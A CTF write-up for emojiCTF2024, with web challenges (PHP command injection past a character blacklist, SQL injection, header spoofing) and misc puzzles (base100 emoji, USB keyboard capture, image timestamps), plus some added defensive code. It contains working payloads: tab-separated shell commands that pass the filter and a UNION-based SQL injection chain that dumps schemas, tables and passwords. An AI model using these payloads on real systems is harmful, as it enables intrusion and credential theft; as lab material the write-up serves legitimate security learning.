RE:emojiCTF2024

WEB

rce

F12 and right-click are disabled.

view-source:

Hint

Usually this is /robot.txt or /robots.txt.

Here it is /robots.txt.

/fl@g.php

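<?php

highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['emo'])) {
    $emo = $_GET['emo'];
    // Blacklist: ; " * space, letters b-h and m-r (case-insensitive), $ { } ^ >
    if (!preg_match("/\;|\"|\*| |[b-h]|[m-r]|\\$|\{|\}|\^|\>/i", $emo)) {
        system($emo); // anything that passes the blacklist runs as a shell command
    } else {
        echo "Again";
    }
} else {
    echo "Try";
}
?>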

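Simple command execution.

The flag is in flag.txt.

The following are filtered: ; " * space b c d e f g h m n o p q r $ { } ^ >

A space can be replaced with $IFS, ${IFS}, $IFS$9, %09, <, >, <>, {,} (for example {cat,/etc/passwd}), %20 (space), %09 (tab). Of these, the forms that need $, {, }, > or a literal space are blocked by this filter, so the payloads below use %09.

vi can be used.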

payload:

?emo=vi%09?la?.txt
?emo=tail%09?la?.txt
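
Why the blacklist fails, as an added example (not part of the original writeup or the challenge source): a Python re-implementation of the preg_match() pattern that lists which characters it never matches and checks the two payloads above, next to an allowlist lookup of the kind that should replace it. The `ALLOWED_ACTIONS` table, the function names and the `cat%20flag.txt` contrast case are hypothetical.

```python
import re
import string
from urllib.parse import unquote

# Same pattern as the preg_match() call in /fl@g.php, case-insensitive.
BLACKLIST = re.compile(r';|"|\*| |[b-h]|[m-r]|\$|\{|\}|\^|>', re.IGNORECASE)

def passes_blacklist(value: str) -> bool:
    """True when the PHP filter would hand `value` to system()."""
    return BLACKLIST.search(value) is None

def surviving_chars() -> str:
    """Lowercase letters, digits, punctuation and tab that the blacklist never matches."""
    candidates = string.ascii_lowercase + string.digits + string.punctuation + "\t"
    return "".join(c for c in candidates if passes_blacklist(c))

# Hypothetical allowlist: the client picks a name, never a command line.
ALLOWED_ACTIONS = {"uptime": ["uptime"], "disk": ["df", "-h"]}

def resolve_action(name: str):
    """Return the fixed argv for a known action, or None for anything else."""
    return ALLOWED_ACTIONS.get(name)

if __name__ == "__main__":
    print("still allowed:", repr(surviving_chars()))
    # The two query values from this page plus one blocked contrast case,
    # URL-decoded the way PHP fills $_GET.
    for raw in ["vi%09?la?.txt", "tail%09?la?.txt", "cat%20flag.txt"]:
        emo = unquote(raw)
        print(f"{raw!r:20} blacklist passes: {passes_blacklist(emo)!s:5} "
              f"allowlist: {resolve_action(emo)}")
```

The surviving set still contains tab, `?`, `<` and enough letters to spell other commands, which is why the fix is to stop passing request data to system() rather than to extend the pattern.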

http

After reading a writeup, I understood that the request method needs to be changed to PUT.

List of HTTP request methods: PUT GET POST HEAD OPTIONS PATCH DELETE TRACE CONNECT

Request /fl1l1l1l1ag.php

e4_sql

Test with 1"

Both password and username produce errors.

username=1" order by 1,2 --+    (no error)
username=1" order by 1,2,3 --+  (error)

So the column count is 2.

password=1' order by 1,2,3,4,5 --+&submit=%E6%8F%90%E4%BA%A4&username=1" union select group_concat(schema_name),2 from information_schema.schemata --+

Query the students schema:

password=1' order by 1,2,3,4,5 --+&submit=%E6%8F%90%E4%BA%A4&username=1" union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='students') --+ --+

Query the columns of the information table:

password=1' order by 1,2,3,4,5 --+&submit=%E6%8F%90%E4%BA%A4&username=1" union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='students' and table_name='information') --+

Query password:

password=1' order by 1,2,3,4,5 --+&submit=%E6%8F%90%E4%BA%A4&username=1" union select 1,(select group_concat(password) from students.information)--+

This gives the flag.

easy_web

Hint 1: User-Agent:Baiduspider

Change the UA header as the hint says.

Reference:

https://developers.cloudflare.com/fundamentals/reference/http-headers/

Add:

CF-Connecting-IP:1 (any value)

Next, an onion (Tor) HTTP proxy needs to be added.

According to the CF documentation, add:

CF-IPCountry:T1
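
The challenge accepts these headers from any client, which is why they can simply be typed in. An added example (not from the original writeup or the challenge) of the server-side check that prevents this: CF-* headers are honoured only when the TCP peer is a configured proxy. The network range is a documentation placeholder, and the function names and sample requests are constructed.

```python
import ipaddress

# Placeholder range (RFC 5737 documentation block), constructed for this example.
# A real deployment loads the proxy provider's published ranges instead.
TRUSTED_PROXIES = [ipaddress.ip_network("192.0.2.0/24")]

def from_trusted_proxy(peer_ip: str) -> bool:
    """True when the TCP peer address belongs to a configured proxy range."""
    addr = ipaddress.ip_address(peer_ip)
    return any(addr in net for net in TRUSTED_PROXIES)

def client_context(peer_ip: str, headers: dict) -> dict:
    """Decide which client IP and country the application may rely on."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    if not from_trusted_proxy(peer_ip):
        # Direct connection: every CF-* header is client-controlled input.
        return {"client_ip": peer_ip, "country": None, "via_proxy": False}
    try:
        client_ip = str(ipaddress.ip_address(hdrs.get("cf-connecting-ip", "")))
    except ValueError:
        client_ip = peer_ip  # malformed value such as "1": fall back to the peer
    return {"client_ip": client_ip,
            "country": hdrs.get("cf-ipcountry"),
            "via_proxy": True}

if __name__ == "__main__":
    # Constructed request carrying the headers used in this challenge.
    spoofed = {"User-Agent": "Baiduspider",
               "CF-Connecting-IP": "1",
               "CF-IPCountry": "T1"}
    print(client_context("203.0.113.7", spoofed))   # direct client: headers ignored
    print(client_context("192.0.2.10", {"CF-Connecting-IP": "198.51.100.5",
                                        "CF-IPCountry": "T1"}))
```

The User-Agent value has no equivalent check inside the request itself, so a crawler name in that header should never be used for access decisions.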

MISC

emoji

def emoji_to(emos):
    codes = []
    for emo in emos:
        code = ord(emo)  # Unicode code point of this emoji
        codes.append(code)
    return codes

if __name__ == "__main__":
    emos = []
    converted = emoji_to(emos)
    print(converted)



'''ono'''
'''[128093, 128099, 128088, 128094, 128114, 128092, 128100, 128039, 128097, 128096, 128086, 128040, 128106, 128086, 128106, 128102, 128086, 128043, 128108, 128101, 128116]'''

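This program converts a string of emoji into their corresponding Unicode code points (their numeric representation). Unicode code points are the standard numeric encoding used to represent characters on computers; every character, emoji included, has a unique numeric identifier.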

exp:

enc = [128093, 128099, 128088, 128094, 128114, 128092, 128100, 128039, 128097, 128096, 128086, 128040, 128106, 128086, 128106, 128102, 128086, 128043, 128108, 128101, 128116]
for i in enc:
    print(chr(i), end="")

#👝👣👘👞👲👜👤🐧👡👠👖🐨👪👖👪👦👖🐫👬👥👴

Decode the emoji as base100:

https://ctf.bugku.com/tool/base100
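
What the base100 step does, as an added example (not from the original writeup): base100 maps each byte b to the code point U+1F3F7 + b, so decoding is a subtraction with a range check. The function names are hypothetical; the code-point list is the one from the exp above.

```python
BASE100_OFFSET = 0x1F3F7  # code point that encodes byte 0x00

def base100_encode(data: bytes) -> str:
    """Encode bytes as base100 emoji, one emoji per byte."""
    return "".join(chr(BASE100_OFFSET + b) for b in data)

def base100_decode(text: str) -> bytes:
    """Decode base100 emoji back to bytes, rejecting anything out of range."""
    out = bytearray()
    for pos, ch in enumerate(text):
        value = ord(ch) - BASE100_OFFSET
        if not 0 <= value <= 0xFF:
            raise ValueError(f"character {ch!r} at index {pos} is not base100")
        out.append(value)
    return bytes(out)

# Code points from the challenge output quoted above.
ENC = [128093, 128099, 128088, 128094, 128114, 128092, 128100, 128039,
       128097, 128096, 128086, 128040, 128106, 128086, 128106, 128102,
       128086, 128043, 128108, 128101, 128116]

def solve() -> str:
    """Code points -> emoji string -> base100-decoded ASCII text."""
    emoji = "".join(chr(c) for c in ENC)
    return base100_decode(emoji).decode("ascii")

if __name__ == "__main__":
    print(solve())
```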

ez_png

LSB steganography in the highest bit.

keyboard

USB traffic.

Extract with tshark:

tshark -T json -r 题目.pcapng > output.json

Filter out all usbhid.data entries:

strings output.json | grep "usbhid.data" > 1.txt

Note: the encoding of output.json may prevent strings from recognizing it.

The following command converts the encoding:

iconv -f UTF-16LE -t UTF-8 output.json | grep "usbhid.data" > 1.txt

This produces the usbhid.data lines.

Strip the field names.

exp:

normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i",
              "0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r",
              "16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1",
              "1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0",
              "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[",
              "30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/",
              "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
              "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I",
             "0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R",
             "16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!",
             "1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
             "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{",
             "30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?",
             "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
             "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}

output = []
keys = open('pos.txt')  # path to the data file
for line in keys:
    try:
        # Keep only reports whose first byte is 00 (no modifier) or 02 (shift),
        # whose third byte (line[6:8]) is a non-zero keycode, and whose other bytes are 00.
        if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
            continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        else:
            output += ['[unknown]']
    except IndexError:
        pass
keys.close()

flag = 0
print("".join(output))
# Apply each <DEL> by removing it together with the entry before it.
for i in range(len(output)):
    try:
        a = output.index('<DEL>')
        del output[a]
        del output[a-1]
    except (ValueError, IndexError):
        pass
# Uppercase everything typed between a pair of <CAP> presses.
for i in range(len(output)):
    try:
        if output[i] == "<CAP>":
            flag += 1
            output.pop(i)
            if flag == 2:
                flag = 0
        if flag != 0:
            output[i] = output[i].upper()
    except IndexError:
        pass
print('output :' + "".join(output))


/bin/python3.10 /mnt/c/Users/EZLING/Desktop/Tool/脚本/MIsc/USB/键盘/ISCTF2023_EZUSB.py 
flag{<CAP>usb<CAP>_misc_keyboard_<CAP><CAP>test<DEL><DEL><DEL><DEL>flag}
output :flag{USB_misc_keyboard_<CAP>FLAG}

flag{USB_misc_keyboard_flag}

Or solve it in one click with mumuzi's tool.

Time to say good bye

The archive contains 12 images.

Using each image's time:

a = hour + minute + second

Convert each a from its ASCII code to a character.

101 122 95 116 105 109 101 95 102 108 97 103

https://www.rapidtables.org/zh-CN/convert/number/ascii-hex-bin-dec-converter.html

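Arranged emoji

flag: [image]

Challenge: [image]

According to the hint:

The position of each emoji in the challenge represents a number.

The emoji in 题目.png are numbered in order starting from 0.

The numbers corresponding to the flag:

28 26 6 0 6 7 20 7 3 4 1 3 0 7 1

Concatenate: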

emojiCTF{282660672073413071}